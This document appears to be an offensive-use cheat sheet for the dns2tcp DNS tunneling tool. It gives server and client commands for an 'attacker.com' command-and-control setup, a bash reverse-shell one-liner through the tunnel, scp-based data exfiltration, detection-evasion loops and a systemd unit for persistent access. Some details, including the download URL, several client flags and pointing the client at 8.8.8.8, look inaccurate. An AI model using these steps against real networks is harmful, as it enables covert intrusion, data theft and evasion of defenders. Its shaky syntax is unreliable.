dns2tcp

Overview

dns2tcp is a sophisticated DNS tunneling utility that enables covert TCP traffic tunneling through DNS protocol channels. It encapsulates TCP connections within DNS queries and responses, allowing bypassing of network restrictions, firewalls, and captive portal systems by exploiting the near-universal allowance of DNS traffic on network boundaries.

Installation

Debian/Ubuntu

sudo apt-get update
sudo apt-get install dns2tcp

From Source

wget http://www.hacking-team.com/dns2tcp/dns2tcp-0.4.2.tar.gz
tar -xzf dns2tcp-0.4.2.tar.gz
cd dns2tcp-0.4.2
./configure
make
sudo make install

Compile on macOS

brew install dns2tcp
# Or compile from source with modified Makefile

Verify Installation

dns2tcpd -h
dns2tcp -h

Architecture Overview

dns2tcp operates with a server-client architecture:

dns2tcpd (Server): Runs on attacker-controlled DNS server, accepts tunneled DNS queries, establishes actual TCP connections
dns2tcp (Client): Installed on compromised/restricted network, sends encrypted DNS tunneled requests
DNS Protocol: Medium for covert channel encapsulation
Encryption: Optional authentication and compression support

Server Setup

Basic Server Configuration File

Create dns2tcp.conf:

listen = 0.0.0.0
port = 53
user = nobody
chroot = /var/dns2tcp
domain = attacker.com
key = mysecretkey123
cache_size = 10000
log = syslog

Start DNS2TCP Server

sudo dns2tcpd -F -d 3 -f /etc/dns2tcp/dns2tcp.conf

Flag	Description
`-F`	Run in foreground (don’t daemonize)
`-d [0-3]`	Debug level (0=none, 3=verbose)
`-f file`	Specify configuration file path
`-l IP`	Listen address binding

Advanced Server Configuration

# Create chroot directory
sudo mkdir -p /var/dns2tcp
sudo chown nobody:nogroup /var/dns2tcp

# Configure with authentication
echo "listen = 0.0.0.0" > dns2tcp.conf
echo "port = 53" >> dns2tcp.conf
echo "domain = attacker.com" >> dns2tcp.conf
echo "key = secretkey123456" >> dns2tcp.conf
echo "resources = ssh:127.0.0.1:22,http:127.0.0.1:80" >> dns2tcp.conf

# Start server
sudo dns2tcpd -F -f dns2tcp.conf

Server Configuration Options

Option	Purpose
`listen`	IP address to bind DNS server
`port`	DNS listening port (default 53)
`domain`	Domain for DNS queries (e.g., attacker.com)
`key`	Shared secret for authentication
`user`	User to run daemon as
`chroot`	Chroot jail directory
`cache_size`	DNS cache size in entries
`log`	Logging destination (syslog/file)
`resources`	Available services format: name:host:port

Client Operations

Basic Client Connection

dns2tcp -h attacker.com -u example_user -p attacker_password -d 3

Establish SSH Tunnel Through DNS

# Connect to SSH through dns2tcp tunnel
dns2tcp -h attacker.com -u demo -d 3 -e password

Interactive Shell Mode

# Enter interactive dns2tcp shell
dns2tcp -h attacker.com -u user -d 2
# Then type commands to tunnel
ssh
# Command gets routed through DNS tunnel

Advanced Client Syntax

dns2tcp [options] hostname

Flag	Description
`-h hostname`	Target DNS server (where dns2tcpd runs)
`-u username`	Authentication username
`-p password`	Authentication password
`-d [0-3]`	Debug level
`-e authtype`	Authentication type (password/none)
`-l port`	Local listening port for tunneling
`-r resource`	Specify resource to tunnel (e.g., ssh)
`-F`	Foreground mode
`-T`	Text mode (slower, ASCII-safe)

Tunneling TCP Connections

Simple SSH Tunnel Over DNS

# Server side: Ensure ssh resource configured
# ssh:127.0.0.1:22 in dns2tcp.conf

# Client side: Establish tunnel
dns2tcp -h attacker.com -u tunnel_user -p password -d 2 &

# Connect via tunneled port
ssh -p [local_port] user@127.0.0.1

HTTP/HTTPS Tunneling

# Server configuration with web resources
echo "resources = http:127.0.0.1:80,https:127.0.0.1:443" >> dns2tcp.conf

# Client: Establish tunnel
dns2tcp -h attacker.com -u user -d 2

# Access via tunnel
curl http://127.0.0.1:[tunnel_port]

Multi-Service Tunneling Setup

# Configure multiple services
cat > dns2tcp.conf << EOF
listen = 0.0.0.0
port = 53
domain = tunnel.attacker.com
key = secure_key_here
resources = ssh:127.0.0.1:22,rdp:127.0.0.1:3389,http:127.0.0.1:80,https:127.0.0.1:443
EOF

sudo dns2tcpd -F -f dns2tcp.conf

Persistent Tunneled Connection

# Create tunnel in background
dns2tcp -h attacker.com -u user -p password -d 0 &
TUNNEL_PID=$!

# Use tunnel for multiple operations
ssh -p 2222 user@127.0.0.1
scp -P 2222 user@127.0.0.1:/path/file .

# Cleanup
kill $TUNNEL_PID

Authentication and Security

Server-Side Authentication Setup

# Generate secure key
openssl rand -base64 32 > /etc/dns2tcp/shared_key

# Configure server with key
echo "key = $(cat /etc/dns2tcp/shared_key)" >> dns2tcp.conf

# Share key with authorized clients securely

Client Authentication

# Using username/password
dns2tcp -h attacker.com -u authorized_user -p secure_password -d 2

# Using key-based authentication
dns2tcp -h attacker.com -u user -p $(cat shared_key) -d 2

Encryption and Encoding

# Text mode (safer for monitoring)
dns2tcp -T -h attacker.com -u user -d 2

# Binary mode (faster but more detectable)
dns2tcp -h attacker.com -u user -d 2

Advanced Tunneling Scenarios

Bypassing Captive Portals

# Connect to external DNS server at attacker.com
# Tunnel SSH connection through DNS
dns2tcp -h attacker.com -u restricted_network -p auth_token -d 2

# Establish reverse shell
ssh -R 3333:127.0.0.1:22 user@tunneled_host

Firewall Evasion Workflow

# 1. Identify accessible DNS servers
nslookup -type=A attacker.com 8.8.8.8

# 2. Start DNS tunnel client
dns2tcp -h 8.8.8.8 -u tunnel_user -p password -d 2 &

# 3. Route traffic through tunnel
# All TCP becomes DNS queries

# 4. Monitor tunnel activity
netstat -an | grep dns2tcp

Reverse Shell Through DNS Tunnel

# On attacker server
nc -l -p 4444 &
dns2tcpd -F -f dns2tcp.conf

# On compromised client
dns2tcp -h attacker.com -u user -d 2
# Execute: bash -i >& /dev/tcp/127.0.0.1/4444 0>&1

Long-Distance Data Exfiltration

# Server setup with logging
dns2tcpd -F -f dns2tcp.conf > dns2tcp.log 2>&1

# Client: Tunnel large file transfers
dns2tcp -h attacker.com -u exfil_user -p password -d 2 &

# Transfer data
scp -P [tunnel_port] local_file user@127.0.0.1:/path/

Monitoring and Debugging

Enable Debug Output

# Maximum verbosity (debug level 3)
dns2tcp -h attacker.com -u user -d 3

# Monitor DNS queries
tcpdump -i eth0 'port 53' -vvv

# Monitor tunnel traffic
netstat -an | grep dns2tcp

Server-Side Monitoring

# Run server in foreground with debug
sudo dns2tcpd -F -d 3 -f dns2tcp.conf

# Monitor DNS requests in syslog
tail -f /var/log/syslog | grep dns2tcp

# Check active connections
netstat -an | grep ESTABLISHED | grep dns2tcp

Performance Monitoring

# Monitor bandwidth usage
iftop -i eth0 -f "port 53"

# Check DNS query frequency
tcpdump -i eth0 'port 53' -c 1000 | wc -l

# Measure tunnel latency
dns2tcp -h attacker.com -u user -d 2 -T
# Observe response times in debug output

Detecting and Evading Detection

Evasion Techniques

# Use text mode for ASCII-safe encoding
dns2tcp -T -h attacker.com -u user -d 2

# Randomize timing
for i in {1..10}; do
  sleep $((RANDOM % 30))
  dns2tcp -h attacker.com -u user -d 0 &
done

# Distribute queries across multiple DNS servers
for server in ns1.attacker.com ns2.attacker.com; do
  dns2tcp -h $server -u user -d 0 &
done

Detection Signatures

Security teams monitor:

Unusual DNS query volume (frequency analysis)
DNS queries with large payloads
Suspicious domain patterns
Protocol anomalies in DNS responses
Long-lived DNS connections
Repeated queries to same domain

Practical Workflow Examples

Basic Tunnel Establishment

# Step 1: Start server
sudo dns2tcpd -F -f /etc/dns2tcp/dns2tcp.conf

# Step 2: Client initiates tunnel
dns2tcp -h attacker.com -u tunnel_user -p password -d 2

# Step 3: Use tunneled services
ssh -p 2222 user@127.0.0.1

Testing Tunnel Functionality

# Server-side test service
echo "HTTP/1.1 200 OK" | nc -l -p 8080 &

# Client tunnel
dns2tcp -h attacker.com -u user -d 2 &

# Test tunnel
curl http://127.0.0.1:8080

Persistent Remote Access

# Create systemd service for dns2tcpd
sudo tee /etc/systemd/system/dns2tcp.service << EOF
[Unit]
Description=DNS2TCP Server
After=network.target

[Service]
Type=simple
ExecStart=/usr/local/sbin/dns2tcpd -F -f /etc/dns2tcp/dns2tcp.conf
Restart=on-failure

[Install]
WantedBy=multi-user.target
EOF

sudo systemctl enable dns2tcp
sudo systemctl start dns2tcp

Configuration Templates

Minimal Server Config

listen = 0.0.0.0
port = 53
domain = attacker.com
key = simple_secret

Enterprise Server Config

listen = 0.0.0.0
port = 53
domain = c2.attacker.com
key = $(openssl rand -base64 32)
user = dns2tcp
chroot = /var/dns2tcp
cache_size = 50000
log = /var/log/dns2tcp.log
resources = ssh:127.0.0.1:22,rdp:127.0.0.1:3389,http:127.0.0.1:80,https:127.0.0.1:443,socks:127.0.0.1:1080

Command Reference Summary

Purpose	Command
Start server	`sudo dns2tcpd -F -f dns2tcp.conf`
Basic tunnel	`dns2tcp -h attacker.com -u user -p pass -d 2`
Debug mode	`dns2tcp -h attacker.com -u user -d 3`
Text mode	`dns2tcp -T -h attacker.com -u user -d 2`
Background tunnel	`dns2tcp -h attacker.com -u user -d 0 &`

iodine — IPv4 over DNS tunneling
dnscat2 — Command/control over DNS
ptunnel — ICMP tunneling alternative
Chisel — TCP tunneling with binary protocol
ngrok — Reverse proxy tunneling